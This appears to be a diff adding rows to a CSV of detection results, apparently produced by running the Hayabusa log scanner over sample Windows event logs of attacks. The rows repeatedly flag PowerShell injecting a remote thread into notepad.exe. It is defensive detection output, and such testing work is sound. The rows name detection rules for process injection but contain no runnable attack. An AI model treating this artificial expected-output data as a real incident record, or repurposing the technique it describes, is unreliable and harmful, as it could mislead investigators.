+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
